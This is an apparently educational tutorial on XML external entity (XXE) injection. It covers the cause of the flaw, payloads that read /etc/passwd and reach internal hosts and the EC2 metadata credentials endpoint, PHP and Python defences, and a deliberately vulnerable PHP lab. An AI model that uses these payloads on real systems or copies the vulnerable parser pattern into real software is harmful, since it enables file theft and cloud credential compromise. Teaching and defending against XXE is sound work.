XML external entity injection (XXE) lets an attacker read sensitive data from the server through a crafted request. Because the same mechanism can make the server fetch arbitrary URLs, XXE combines with server-side request forgery (SSRF) and can be escalated into attacks on the internal network behind the application.
Cause of the vulnerability

XML is a markup language for structured data. XML entities are a way of representing a piece of data inside an XML document by name instead of writing the data itself. A DTD (document type definition) holds the declarations that describe the document's structure and its entities; it lives in the optional <!DOCTYPE element at the start of the document, which is where custom entities are declared. XML external entities are custom entities whose content is defined outside the DTD that declares them: the SYSTEM keyword names a URL, and the parser fetches that URL when the entity is referenced. The vulnerability exists whenever an application parses XML supplied by the user with a parser that still loads external entities.

Take a stock-check endpoint that accepts an XML body like this:
<?xml version="1.0"?>
<stockCheck>
<productId>
381
</productId>
</stockCheck>
Replacing the product ID with a reference to an external entity:

<?xml version="1.0"?>
<!DOCTYPE a [ <!ENTITY b SYSTEM "file:///etc/passwd"> ]>
<stockCheck>
<productId>
&b;
</productId>
</stockCheck>

The entity b is declared with the SYSTEM identifier file:///etc/passwd, so when the parser expands &b; it reads /etc/passwd and substitutes the file's value into productId. If the application reflects the product ID in its response (or in an error message quoting it), the attacker reads the file.

The same mechanism reaches other URL schemes. Pointing the entity at an internal host turns XXE into SSRF: the request is issued by the server, from inside its network.

<?xml version="1.0"?>
<!DOCTYPE test [ <!ENTITY b SYSTEM "http://internal.feifei.com/"> ]>
<stockCheck>
<productId>
&b;
</productId>
</stockCheck>
A common target in cloud environments is the instance metadata service, for example the EC2 endpoint http://169.254.169.254/latest/meta-data/iam/security-credentials/admin, which returns the temporary IAM credentials of the role named admin. The response, or an error that quotes it, is then reflected to the attacker exactly like the file contents above.
Defence

In PHP, disable external entity loading before parsing untrusted XML:

libxml_disable_entity_loader(true);

Two caveats: since libxml 2.9.0 external entities are only fetched when the parser is explicitly asked to substitute them (for example with the LIBXML_NOENT option), and for that reason the function is deprecated as of PHP 8.0. The general rule for every parser, in any language, is to refuse DTDs on endpoints that do not need them and to keep external entity resolution switched off.
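The behaviour described above (file read, the SSRF variant, and the defence), as an added example that is not part of the original page or of its PHP lab. Python's standard-library SAX parser (expat) stands in for SimpleXML because the same kind of parser flag decides whether SYSTEM identifiers are fetched. The stock-check document, the entity name xxe, the temporary file standing in for /etc/passwd, and the hardening checks are all constructed for this demo.

```python
"""Added example, not code from the original page: the page's stock-check XML
parsed with external entities on (vulnerable) and off (hardened).  All inputs
below are constructed for the demo."""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class ProductIdHandler(ContentHandler):
    """Collects the text inside the first <productId> element."""

    def __init__(self):
        super().__init__()
        self._inside = False
        self._chunks = []

    def startElement(self, name, attrs):
        if name == "productId":
            self._inside = True

    def endElement(self, name):
        if name == "productId":
            self._inside = False

    def characters(self, content):
        if self._inside:
            self._chunks.append(content)

    @property
    def product_id(self):
        return "".join(self._chunks).strip()


def parse_product_id(xml_bytes, fetch_external_entities):
    """With fetch_external_entities=True the parser opens the SYSTEM identifier
    of every external entity referenced in content (file://, http://, ...) and
    its contents become the element text: the page's XXE behaviour."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, fetch_external_entities)
    handler = ProductIdHandler()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.product_id


def parse_product_id_hardened(xml_bytes):
    """A stock check never needs a DTD: refuse any DOCTYPE up front, and keep
    external entity fetching off in case a DTD ever gets through anyway."""
    if b"<!DOCTYPE" in xml_bytes:  # the keyword is case-sensitive in XML
        raise ValueError("DTDs are not accepted on this endpoint")
    return parse_product_id(xml_bytes, fetch_external_entities=False)


def xxe_payload(target_url):
    """Same shape as the page's payload; target_url is the SYSTEM identifier
    (file:///etc/passwd, http://internal.feifei.com/, the metadata URL, ...)."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM "{target_url}"> ]>\n'
        "<stockCheck><productId>&xxe;</productId></stockCheck>\n"
    ).encode()


def demo():
    """Returns (text leaked by the vulnerable parse, text with fetching off,
    whether the hardened parse refused the document)."""
    # Constructed stand-in for /etc/passwd so the demo never touches real files.
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")
        secret_path = f.name
    try:
        payload = xxe_payload("file://" + secret_path)
        leaked = parse_product_id(payload, fetch_external_entities=True)
        empty = parse_product_id(payload, fetch_external_entities=False)
        try:
            parse_product_id_hardened(payload)
            refused = False
        except ValueError:
            refused = True
        return leaked, empty, refused
    finally:
        os.unlink(secret_path)


if __name__ == "__main__":
    print(demo())
```

The same vulnerable parse with an http:// SYSTEM identifier is the SSRF case: the parser hands the URL to urllib, so an internal hostname or the metadata address is fetched from the server's own network position. Python has shipped with external general entities disabled by default since 3.7.1, which is why the flag has to be turned on to reproduce the leak; a parser that loads them should be treated as the exception that needs justifying.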
Lab

xml.php is the vulnerable endpoint: it reads the raw POST body, hands it straight to SimpleXML and echoes the name element, so the response reflects whatever the parser substituted. The request body for this lab is the payload above with the entity referenced inside a name element.

<?php
// Raw request body, parsed as-is: no check for a DOCTYPE, no restriction on entities.
$data = file_get_contents('php://input');
$test = new SimpleXMLElement($data);
// Reflects the parsed value, which is what leaks the expanded entity to the client.
echo $test->name;
?>

If the entity is not expanded in your environment, the image carries libxml 2.9.0 or newer, which fetches external entities only when asked; pass LIBXML_NOENT as the second constructor argument to reproduce the original behaviour.
docker-compose.yml serves the ./server directory (which holds xml.php) with the php:7-apache image on local port 8002:
version: "2"
services:
web:
image: php:7-apache
ports:
- "8002:80"
volumes:
- ./server:/var/www/html/